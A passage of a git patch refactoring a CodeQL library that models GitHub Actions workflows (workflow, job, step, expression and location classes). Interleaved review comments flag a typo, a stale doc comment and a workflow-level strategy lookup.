Workflow extends AstNode instanceof YamlDocument, YamlMapping { +class Workflow extends WorkflowNode { + Workflow() { n instanceof YamlDocument and n instanceof YamlMapping } + /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ - YamlMapping getJobs() { result = super.lookup("jobs") } + YamlMapping getJobs() { result = this.asYamlMapping().lookup("jobs") } /** Gets the 'global' `env` mapping in this workflow. */ - WorkflowEnv getEnv() { result = super.lookup("env") } + WorkflowEnv getEnv() { result.asYamlNode() = this.asYamlMapping().lookup("env") } /** Gets the name of the workflow. 
*/ - string getName() { result = super.lookup("name").(YamlString).getValue() } + string getName() { result = this.asYamlMapping().lookup("name").(YamlString).getValue() } /** Gets the job within this workflow with the given job ID. */ Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } 
@@ -135,107 +190,128 @@ class Workflow extends AstNode instanceof YamlDocument, YamlMapping { Job getAJob() { result = this.getJob(_) } predicate hasTriggerEvent(string trigger) { - exists(YamlNode n | n = super.lookup("on").(YamlMappingLikeNode).getNode(trigger)) + exists(YamlNode y | + y = this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode(trigger) + ) } string getATriggerEvent() { - exists(YamlNode n | n = super.lookup("on").(YamlMappingLikeNode).getNode(result)) + exists(YamlNode y | y = this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode(result)) } - Permissions getPermissions() { result = super.lookup("permissions") } + Permissions getPermissions() { result.asYamlNode() = this.asYamlMapping().lookup("permissions") } - Strategy getStrategy() { result = super.lookup("strategy") } + Strategy getStrategy() { result.asYamlNode() = this.asYamlMapping().lookup("strategy") } } -class ReusableWorkflow extends Workflow instanceof YamlMapping { +class ReusableWorkflow extends Workflow { YamlValue workflow_call; ReusableWorkflow() { - super.lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call + n instanceof YamlMapping and + this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call } - Outputs getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } + Outputs getOutputs() { result.asYamlNode() = workflow_call.(YamlMapping).lookup("outputs") } StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } - Input getAnInput() { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } + Input getAnInput() { + workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) + } Input getInput(string name) { - workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) and - result.(YamlString).getValue() = name + 
workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) and + result.asYamlNode().(YamlString).getValue() = name } } -class Input extends AstNode { +class Input extends WorkflowNode { YamlMapping parent; - Input() { parent.lookup("inputs").(YamlMapping).maps(this, _) } + Input() { parent.lookup("inputs").(YamlMapping).maps(this.asYamlNode(), _) } } -class Outputs extends AstNode instanceof YamlMapping { +class Outputs extends WorkflowNode { YamlMapping parent; - Outputs() { parent.lookup("outputs") = this } + Outputs() { + n instanceof YamlMapping and + parent.lookup("outputs") = this.asYamlNode() + } /** * Gets an output expression. */ StringLiteral getAnOutput() { - super.lookup(_).(YamlMapping).lookup("value") = result or - super.lookup(_) = result + this.asYamlMapping().lookup(_).(YamlMapping).lookup("value") = result.asYamlNode() or + this.asYamlMapping().lookup(_) = result.asYamlNode() } /** * Gets a specific output expression by name. */ StringLiteral getOutput(string name) { - super.lookup(name).(YamlMapping).lookup("value") = result or - super.lookup(name) = result + this.asYamlMapping().lookup(name).(YamlMapping).lookup("value") = result.asYamlNode() or + this.asYamlMapping().lookup(name) = result.asYamlNode() } - string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } + string getAnOutputName() { + this.asYamlMapping().maps(any(YamlString s | s.getValue() = result), _) + } override string toString() { result = "Job outputs node" } } -class Permissions extends AstNode instanceof YamlMapping { +class Permissions extends WorkflowNode { YamlMapping parent; - Permissions() { parent.lookup("permissions") = this } + Permissions() { + n instanceof YamlMapping and + parent.lookup("permissions") = this.asYamlNode() + } } -class Strategy extends AstNode instanceof YamlMapping { +class Strategy extends WorkflowNode { YamlMapping parent; - Strategy() { parent.lookup("strategy") = this } + 
Strategy() { + n instanceof YamlMapping and + parent.lookup("strategy") = this.asYamlNode() + } /** * Gets a specific matric expression (YamlMapping) by name. */ StringLiteral getMatrixVar(string name) { - super.lookup("matrix").(YamlMapping).lookup(name) = result + this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(name) = result.asYamlNode() } /** * Gets a specific matric expression (YamlMapping) by name. */ - StringLiteral getAMatrixVar() { super.lookup("matrix").(YamlMapping).lookup(_) = result } + StringLiteral getAMatrixVar() { + this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(_) = result.asYamlNode() + } } /** * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ -class Needs extends AstNode instanceof YamlMappingLikeNode { +class Needs extends WorkflowNode { Job job; - Needs() { job.(YamlMapping).lookup("needs") = this } + Needs() { + n instanceof YamlMappingLikeNode and + job.asYamlMapping().lookup("needs") = this.asYamlNode() + } Job getJob() { result = job } Job getANeededJob() { - result.getId() = super.getNode(_).(YamlString).getValue() and + result.getId() = this.asYamlNode().(YamlMappingLikeNode).getNode(_).(YamlString).getValue() and result.getLocation().getFile() = job.getLocation().getFile() // if this instanceof YamlString // then @@ -254,11 +330,14 @@ class Needs extends AstNode instanceof YamlMappingLikeNode { * An Actions job within a workflow. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. */ -class Job extends AstNode instanceof YamlMapping { +class Job extends WorkflowNode { string jobId; Workflow workflow; - Job() { this = workflow.getJobs().lookup(jobId) } + Job() { + n instanceof YamlMapping and + this.asYamlNode() = workflow.getJobs().lookup(jobId) + } /** * Gets the ID of this job, as a string. 
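Review bot: `Workflow.getStrategy()` looks up `strategy` in the top-level workflow mapping, but in the GitHub Actions workflow syntax `strategy` is a job-level key (`jobs.<job_id>.strategy`), so on a valid workflow this predicate should have no result. `MatrixExpression.getTarget()` in the hunk at `-703,7` resolves matrix variables through `exists(Workflow w | w.getStrategy().getMatrixVar(fieldName) = result ...)`. Its body continues outside that hunk, so there may be a job-level branch as well; if there is not, `matrix.*` references would never resolve to a target and flows through them would be missed. I would drop the workflow-level accessor or document why it exists, and resolve through `Job.getStrategy()`. Separately, both `Strategy` doc comments read `Gets a specific matric expression (YamlMapping) by name.`; fix the typo to "matrix", and change the one on `getAMatrixVar` to `/** Gets any matrix variable expression. */`.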
@@ -267,10 +346,14 @@ class Job extends AstNode instanceof YamlMapping { string getId() { result = jobId } /** Gets any steps that are defined within this job. */ - Step getAStep() { result = super.lookup("steps").(YamlSequence).getElementNode(_) } + Step getAStep() { + result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(_) + } /** Gets the step at the given index within this job. */ - Step getStep(int i) { result = super.lookup("steps").(YamlSequence).getElementNode(i) } + Step getStep(int i) { + result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(i) + } /** Gets the workflow this job belongs to. */ Workflow getWorkflow() { result = workflow } @@ -293,7 +376,7 @@ class Job extends AstNode instanceof YamlMapping { * out1: ${steps.foo.bar} * out2: ${steps.foo.baz} */ - Outputs getOutputs() { result = super.lookup("outputs") } + Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } @@ -310,14 +393,14 @@ class Job extends AstNode instanceof YamlMapping { UsesJob getUses() { result.getJob() = this } predicate usesReusableWorkflow() { - this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) + this.asYamlMapping().maps(any(YamlString s | s.getValue() = "uses"), _) } - If getIf() { result = super.lookup("if") } + If getIf() { result.asYamlNode() = this.asYamlMapping().lookup("if") } - Permissions getPermissions() { result = super.lookup("permissions") } + Permissions getPermissions() { result.asYamlNode() = this.asYamlMapping().lookup("permissions") } - Strategy getStrategy() { result = super.lookup("strategy") } + Strategy getStrategy() { result.asYamlNode() = this.asYamlMapping().lookup("strategy") } override string toString() { result = "Job: " + jobId } } 
@@ -326,41 +409,41 @@ class Job extends AstNode instanceof YamlMapping { * A step within an Actions job. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. */ -class Step extends AstNode instanceof YamlMapping { +class Step extends WorkflowNode { YamlMapping parent; - Step() { parent.lookup("steps").(YamlSequence).getElementNode(_) = this } + Step() { parent.lookup("steps").(YamlSequence).getElementNode(_) = this.asYamlNode() } /** Gets the ID of this step, if any. */ - string getId() { result = super.lookup("id").(YamlString).getValue() } + string getId() { result = this.asYamlMapping().lookup("id").(YamlString).getValue() } /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */ - Job getJob() { result = parent } + Job getJob() { result.asYamlNode() = parent } /** Gets the value of the `if` field in this step, if any. */ - If getIf() { result = super.lookup("if") } + If getIf() { result.asYamlNode() = this.asYamlMapping().lookup("if") } } /** * An If node representing a conditional statement. */ -class If extends AstNode { - YamlMapping parent; +class If extends WorkflowNode { + WorkflowNode parent; If() { (parent instanceof Step or parent instanceof Job) and - parent.lookup("if") = this + parent.asYamlMapping().lookup("if") = this.asYamlNode() } - AstNode getEnclosingNode() { result = parent } + WorkflowNode getEnclosingNode() { result = parent } - string getCondition() { result = this.(YamlScalar).getValue() } + string getCondition() { result = this.asYamlNode().(YamlScalar).getValue() } } /** * Abstract class representing a call to a 3rd party action or reusable workflow. */ -abstract class Uses extends AstNode { +abstract class Uses extends WorkflowNode { abstract string getCallee(); abstract string getVersion(); 
@@ -385,7 +468,7 @@ private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } class UsesStep extends Step, Uses { YamlScalar uses; - UsesStep() { this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = "uses"), uses) } + UsesStep() { this.asYamlMapping().maps(any(YamlScalar s | s.getValue() = "uses"), uses) } /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ override string getCallee() { @@ -400,7 +483,7 @@ class UsesStep extends Step, Uses { override string getVersion() { result = uses.getValue().regexpCapture(usesParser(), 3) } override StringLiteral getArgument(string key) { - result = this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) + result.asYamlNode() = this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) } override string toString() { @@ -411,8 +494,11 @@ class UsesStep extends Step, Uses { /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class UsesJob extends Uses instanceof YamlMapping { - UsesJob() { this instanceof Job and this.maps(any(YamlString s | s.getValue() = "uses"), _) } +class UsesJob extends Uses { + UsesJob() { + this instanceof Job and + this.asYamlMapping().maps(any(YamlString s | s.getValue() = "uses"), _) + } Job getJob() { result = this } @@ -428,7 +514,7 @@ class UsesJob extends Uses instanceof YamlMapping { override string getCallee() { exists(YamlString name | - super.lookup("uses") = name and + this.asYamlMapping().lookup("uses") = name and if name.getValue().matches("./%") then result = name.getValue().regexpCapture(this.pathUsesParser(), 1) else 
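Review bot: The QLDoc kept above `UsesJob` in the hunk at `-411,8` still reads `A Uses step represents a call to an action that is defined in a GitHub repository.`, which describes `UsesStep`; the class is a job that has a `uses` key. Something like `/** A job that calls a reusable workflow through a job-level uses key. */` would match what the characteristic predicate checks. The new predicate body also repeats the test that `Job.usesReusableWorkflow()` already performs (hunk at `-310,14`), so it could be written `UsesJob() { this.(Job).usesReusableWorkflow() }` to keep a single definition of that condition. The rest of `UsesJob` continues past this hunk.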
@@ -442,7 +528,7 @@ class UsesJob extends Uses instanceof YamlMapping { /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | - super.lookup("uses") = name and + this.asYamlMapping().lookup("uses") = name and if not name.getValue().matches("\\.%") then result = name.getValue().regexpCapture(this.repoUsesParser(), 4) else none() @@ -450,7 +536,7 @@ class UsesJob extends Uses instanceof YamlMapping { } override StringLiteral getArgument(string key) { - super.lookup("with").(YamlMapping).lookup(key) = result + this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) = result.asYamlNode() } } @@ -461,7 +547,7 @@ class UsesJob extends Uses instanceof YamlMapping { class Run extends Step { StringLiteral script; - Run() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "run"), script) } + Run() { this.asYamlMapping().maps(any(YamlString s | s.getValue() = "run"), script.asYamlNode()) } StringLiteral getScript() { result = script } @@ -473,18 +559,19 @@ class Run extends Step { /** * A YamlString part of a YamlSequence or YamlMapping values. */ -class StringLiteral extends AstNode instanceof YamlString { +class StringLiteral extends WorkflowNode { StringLiteral() { + n instanceof YamlString and exists(YamlCollection c | c instanceof YamlMapping and - c.(YamlMapping).maps(_, this) + c.(YamlMapping).maps(_, this.asYamlNode()) or c instanceof YamlSequence and - c.(YamlSequence).getElementNode(_) = this + c.(YamlSequence).getElementNode(_) = this.asYamlNode() ) } - string getValue() { result = this.(YamlString).getValue() } + string getValue() { result = this.asYamlNode().(YamlString).getValue() } } /** 
@@ -508,7 +595,7 @@ string getASimpleReferenceExpression(YamlString node) { class Expression extends StringLiteral { string expr; - Expression() { expr = getASimpleReferenceExpression(this) } + Expression() { expr = getASimpleReferenceExpression(this.asYamlNode()) } string getExpression() { result = expr } @@ -529,7 +616,7 @@ class ContextExpression extends Expression { abstract string getFieldName(); - abstract AstNode getTarget(); + abstract WorkflowNode getTarget(); } private string stepsCtxRegex() { @@ -574,7 +661,7 @@ class StepsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { this.getLocation().getFile() = result.getLocation().getFile() and result.(Step).getId() = stepId } @@ -601,7 +688,7 @@ class NeedsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { neededJob.getLocation().getFile() = this.getLocation().getFile() and this.getJob().getANeededJob() = neededJob and ( @@ -631,7 +718,7 @@ class JobsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { exists(Job job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and @@ -655,7 +742,7 @@ class InputsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { result.getLocation().getFile() = this.getLocation().getFile() and ( exists(ReusableWorkflow w | w.getInput(fieldName) = result) 
@@ -680,8 +767,8 @@ class EnvExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { - exists(AstNode s | + override WorkflowNode getTarget() { + exists(WorkflowNode s | s.getEnvVar(fieldName) = result and s.getAChildNode*() = this ) @@ -703,7 +790,7 @@ class MatrixExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { exists(Workflow w | w.getStrategy().getMatrixVar(fieldName) = result and w.getAChildNode*() = this From 96246f4b74cd050d2f9b919e9aadf7f626de6041 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 7 Mar 2024 15:35:47 +0100 Subject: [PATCH 0087/1267] Add Expression nodes and their corresponding locations --- .gitignore | 1 + ql/lib/codeql/Locations.qll | 59 ++- ql/lib/codeql/actions/Ast.qll | 353 ++++++++----- ql/lib/codeql/actions/ast/internal/Yaml.qll | 9 +- .../actions/controlflow/internal/Cfg.qll | 27 +- .../codeql/actions/dataflow/ExternalFlow.qll | 10 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 12 +- .../dataflow/internal/DataFlowPublic.qll | 4 +- ...el.yml => actions_github-script.model.yml} | 4 +- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/CompositeActionsSources.ql | 2 +- .../CWE-020/CompositeActionsSummaries.ql | 2 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSources.ql | 2 +- .../CWE-020/ReusableWorkflowsSummaries.ql | 2 +- .../CWE-094/CriticalExpressionInjection.ql | 5 +- .../Security/CWE-094/ExpressionInjection.ql | 5 +- ql/src/Security/CWE-829/UntrustedCheckout.ql | 3 +- .../.github/workflows/expression_nodes.yml | 22 + ql/test/library-tests/test.expected | 250 ++++++++- ql/test/library-tests/test.ql | 8 +- .../CWE-020/CompositeActionsSinks.expected | 18 +- .../CWE-020/CompositeActionsSources.expected | 12 +- .../CompositeActionsSummaries.expected | 12 +- .../CWE-020/ReusableWorkflowsSinks.expected | 6 +- .../CWE-020/ReusableWorkflowsSources.expected | 12 +- .../ReusableWorkflowsSummaries.expected | 18 +- .../.github/workflows/comment_issue.yml | 4 +- .../workflows/comment_issue_newline.yml | 4 +- .../CriticalExpressionInjection.expected | 463 ++++++++--------- .../CWE-094/ExpressionInjection.expected | 480 +++++++++--------- 32 files changed, 1113 insertions(+), 702 deletions(-) rename ql/lib/ext/{PLACEHOLDER.model.yml => actions_github-script.model.yml} (57%) create mode 100644 ql/test/library-tests/.github/workflows/expression_nodes.yml 
diff --git a/.gitignore b/.gitignore index 6c0e5c58738..1127e8f55db 100644 --- a/.gitignore +++ b/.gitignore @@ -3,3 +3,4 @@ ql/lib/.codeql/ ql/src/.codeql/ ql/test/.codeql/ +db/ diff --git a/ql/lib/codeql/Locations.qll b/ql/lib/codeql/Locations.qll index 3a16bdec40d..33a8eba30ac 100644 --- a/ql/lib/codeql/Locations.qll +++ b/ql/lib/codeql/Locations.qll @@ -1,6 +1,7 @@ /** Provides classes for working with locations. */ import files.FileSystem +import codeql.actions.Ast bindingset[loc] pragma[inline_late] 
@@ -11,30 +12,57 @@ private string locationToString(Location loc) { ) } +newtype TLocation = + TBaseLocation(string filepath, int startline, int startcolumn, int endline, int endcolumn) { + exists(File file | + file.getAbsolutePath() = filepath and + locations_default(_, file, startline, startcolumn, endline, endcolumn) + ) + or + exists(ExpressionNode e | + e.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) + ) + or + filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 + } + /** * A location as given by a file, a start line, a start column, * an end line, and an end column. * * For more information about locations see [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). */ -class Location extends @location_default { +class Location extends TLocation, TBaseLocation { + string filepath; + int startline; + int startcolumn; + int endline; + int endcolumn; + + Location() { this = TBaseLocation(filepath, startline, startcolumn, endline, endcolumn) } + /** Gets the file for this location. */ - File getFile() { locations_default(this, result, _, _, _, _) } + File getFile() { + exists(File file | + file.getAbsolutePath() = filepath and + result = file + ) + } /** Gets the 1-based line number (inclusive) where this location starts. */ - int getStartLine() { locations_default(this, _, result, _, _, _) } + int getStartLine() { result = startline } /** Gets the 1-based column number (inclusive) where this location starts. */ - int getStartColumn() { locations_default(this, _, _, result, _, _) } + int getStartColumn() { result = startcolumn } - /** Gets the 1-based line number (inclusive) where this location ends. */ - int getEndLine() { locations_default(this, _, _, _, result, _) } + /** Gets the 1-based line number (inclusive) where this.getLocationDefault() location ends. 
*/ + int getEndLine() { result = endline } - /** Gets the 1-based column number (inclusive) where this location ends. */ - int getEndColumn() { locations_default(this, _, _, _, _, result) } + /** Gets the 1-based column number (inclusive) where this.getLocationDefault() location ends. */ + int getEndColumn() { result = endcolumn } /** Gets the number of lines covered by this location. */ - int getNumLines() { result = this.getEndLine() - this.getStartLine() + 1 } + int getNumLines() { result = endline - startline + 1 } /** Gets a textual representation of this element. */ pragma[inline] @@ -47,13 +75,12 @@ class Location extends @location_default { * For more information, see * [Providing locations in CodeQL queries](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). */ - predicate hasLocationInfo( - string filepath, int startline, int startcolumn, int endline, int endcolumn - ) { - exists(File f | - locations_default(this, f, startline, startcolumn, endline, endcolumn) and - filepath = f.getAbsolutePath() - ) + predicate hasLocationInfo(string p, int sl, int sc, int el, int ec) { + p = filepath and + sl = startline and + sc = startcolumn and + el = endline and + ec = endcolumn } /** Holds if this location starts strictly before the specified location. */ diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 1d86d81a063..21d4f052e13 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -3,7 +3,9 @@ private import codeql.Locations newtype TAstNode = TWorflowNode(YamlNode n) or - TExpressionNode() + TExpressionNode(StringValue n, string expression, int exprOffset) { + expression = getASimpleReferenceExpression(n, exprOffset) + } class AstNode extends TAstNode { abstract AstNode getAChildNode(); 
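Review bot: The doc comments on `getEndLine()` and `getEndColumn()` in the Locations.qll hunk now read "where this.getLocationDefault() location ends", which looks like a search-and-replace that leaked into prose; no `getLocationDefault` member appears anywhere in this hunk. They should read `/** Gets the 1-based line number (inclusive) where this location ends. */` and `/** Gets the 1-based column number (inclusive) where this location ends. */`. The `Location` class body continues past the end of the hunk.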
@@ -12,21 +14,160 @@ class AstNode extends TAstNode { abstract string getAPrimaryQlClass(); + abstract string toString(); + abstract Location getLocation(); - abstract string toString(); + abstract File getFile(); + + /** + * Gets the enclosing workflow statement. + */ + Workflow getEnclosingWorkflow() { this = result.getAChildNode*() } + + /** + * Gets a environment variable expression by name in the scope of the current node. + */ + ExpressionNode getInScopeEnvVarExpr(string name) { + exists(StringValue l, Env env | + env.asYamlMapping().maps(any(YamlScalar s | s.getValue() = name), l.asYamlNode()) and + l.getAnExpression() = result + | + env.(StepEnv).getStep().getAChildNode*() = this + or + env.(JobEnv).getJob().getAChildNode*() = this + or + env.(WorkflowEnv).getWorkflow().getAChildNode*() = this + ) + } } class ExpressionNode extends AstNode, TExpressionNode { - override string toString() { result = "expression node" } + StringValue n; + string rawExpression; + string expression; + int exprOffset; + + ExpressionNode() { + this = TExpressionNode(n, rawExpression, exprOffset - 1) and + expression = + rawExpression.regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + } + + override string toString() { result = expression } override AstNode getAChildNode() { none() } - override AstNode getParentNode() { none() } + override AstNode getParentNode() { result = n } override string getAPrimaryQlClass() { result = "ExpressionNode" } - override Location getLocation() { none() } + string getExpression() { result = expression } + + string getRawExpression() { result = rawExpression } + + Job getJob() { result.getAChildNode*() = n } + + int lineLength(int idx) { + exists(string line | line = n.getValue().splitAt("\n", idx) and result = line.length() + 1) + } + + bindingset[i] + int unboundPartialLineLengthSum(int i) { + result = sum(int j, int length | j in [0 .. 
i] and length = this.lineLength(j) | length) + } + + int partialLineLengthSum(int i) { + i in [0 .. count(n.getValue().splitAt("\n"))] and + result = this.unboundPartialLineLengthSum(i) + } + + predicate expressionOffsets(int sl, int sc, int el, int ec) { + exists(int lineDiff, string style, Location loc | + loc = n.asYamlNode().getLocation() and + lineDiff = loc.getEndLine() - loc.getStartLine() and + style = n.asYamlNode().(YamlString).getStyle() + | + // eg: + // - run: echo "hello" + // - run: 'echo "hello"' + // - run: "echo 'hello'" + style = ["", "\"", "'"] and + lineDiff = 0 and + sl = loc.getStartLine() and + el = sl and + sc = loc.getStartColumn() + exprOffset and + ec = sc + rawExpression.length() - 1 + or + // eg: + // - run: "echo 'hello' + // echo 'hello'" + // - run: "echo 'hello' + // echo 'hello' + // echo 'hello'" + style = ["", "\"", "'"] and + lineDiff > 0 and + sl = loc.getStartLine() and + el = loc.getEndLine() and + sc = loc.getStartColumn() and + ec = loc.getEndColumn() + or + // eg: + // - run: | + // echo "hello" + // - run: | + // echo "hello" + // echo "bye" + style = "|" and + exists(int r | + ( + r > 0 and + this.partialLineLengthSum(r - 1) < exprOffset and + this.partialLineLengthSum(r) >= exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = + n.getKeyNode().getLocation().getStartColumn() + exprOffset - + this.partialLineLengthSum(r - 1) + 2 - 1 and + ec = sc + rawExpression.length() - 1 + or + r = 0 and + this.partialLineLengthSum(r) > exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = n.getKeyNode().getLocation().getStartColumn() + 2 + exprOffset and + ec = sc + rawExpression.length() - 1 + ) + ) + or + // eg: + // - run: > + // echo "hello" + // - run: > + // echo "hello" + // echo "hello" + style = ">" and + sl = loc.getStartLine() + 1 and + el = loc.getEndLine() and + sc = n.getKeyNode().getLocation().getStartColumn() and + ec = loc.getEndColumn() + ) + } + + override Location 
getLocation() { + exists(Location loc | + this.hasLocationInfo(loc.getFile().getAbsolutePath(), loc.getStartLine(), + loc.getStartColumn(), loc.getEndLine(), loc.getEndColumn()) and + result = loc + ) + } + + predicate hasLocationInfo(string path, int sl, int sc, int el, int ec) { + path = n.asYamlNode().getFile().getAbsolutePath() and + this.expressionOffsets(sl, sc, el, ec) + } + + override File getFile() { result = n.asYamlNode().getFile() } } /** @@ -39,37 +180,23 @@ class WorkflowNode extends AstNode, TWorflowNode { override AstNode getParentNode() { result = TWorflowNode(n.getParentNode()) } - override AstNode getAChildNode() { result = TWorflowNode(n.getAChildNode()) } + override AstNode getAChildNode() { + result = TWorflowNode(n.getAChildNode()) + or + exists(ExpressionNode e | e.getParentNode() = this | result = e) + } override string getAPrimaryQlClass() { result = n.getAPrimaryQlClass() } override Location getLocation() { result = n.getLocation() } - override string toString() { result = n.toString() } - - /** - * Gets the enclosing workflow statement. - */ - Workflow getEnclosingWorkflow() { this = result.getAChildNode*() } - - /** - * Gets a environment variable expression by name in the scope of the current node. - */ - StringLiteral getEnvVar(string name) { - exists(Env env | - env.asYamlMapping().maps(any(YamlScalar s | s.getValue() = name), result.asYamlNode()) - | - env.(StepEnv).getStep().getAChildNode*() = this - or - env.(JobEnv).getJob().getAChildNode*() = this - or - env.(WorkflowEnv).getWorkflow().getAChildNode*() = this - ) - } + override File getFile() { result = n.getFile() } YamlNode asYamlNode() { result = n } YamlMapping asYamlMapping() { result = n } + + override string toString() { result = n.toString() } } /** A common class for `env` in workflow, job or step. */ 
@@ -117,7 +244,7 @@ class CompositeAction extends WorkflowNode { CompositeAction() { n instanceof YamlDocument and n instanceof YamlMapping and - this.getLocation().getFile().getBaseName() = ["action.yml", "action.yaml"] and + this.getFile().getBaseName() = ["action.yml", "action.yaml"] and this.asYamlMapping().lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" } @@ -127,9 +254,9 @@ class CompositeAction extends WorkflowNode { Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } - StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } + ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } - StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } + ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } Input getAnInput() { this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) @@ -214,9 +341,9 @@ class ReusableWorkflow extends Workflow { Outputs getOutputs() { result.asYamlNode() = workflow_call.(YamlMapping).lookup("outputs") } - StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } + ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } - StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } + ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } Input getAnInput() { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) 
@@ -245,17 +372,19 @@ class Outputs extends WorkflowNode { /** * Gets an output expression. */ - StringLiteral getAnOutput() { - this.asYamlMapping().lookup(_).(YamlMapping).lookup("value") = result.asYamlNode() or - this.asYamlMapping().lookup(_) = result.asYamlNode() - } + ExpressionNode getAnOutputExpr() { result = this.getOutputExpr(_) } /** * Gets a specific output expression by name. */ - StringLiteral getOutput(string name) { - this.asYamlMapping().lookup(name).(YamlMapping).lookup("value") = result.asYamlNode() or - this.asYamlMapping().lookup(name) = result.asYamlNode() + ExpressionNode getOutputExpr(string name) { + exists(StringValue l | + l.getAnExpression() = result and + ( + this.asYamlMapping().lookup(name).(YamlMapping).lookup("value") = l.asYamlNode() or + this.asYamlMapping().lookup(name) = l.asYamlNode() + ) + ) } string getAnOutputName() { @@ -285,14 +414,14 @@ class Strategy extends WorkflowNode { /** * Gets a specific matric expression (YamlMapping) by name. */ - StringLiteral getMatrixVar(string name) { + StringValue getMatrixVar(string name) { this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(name) = result.asYamlNode() } /** * Gets a specific matric expression (YamlMapping) by name. */ - StringLiteral getAMatrixVar() { + StringValue getAMatrixVar() { this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(_) = result.asYamlNode() } } 
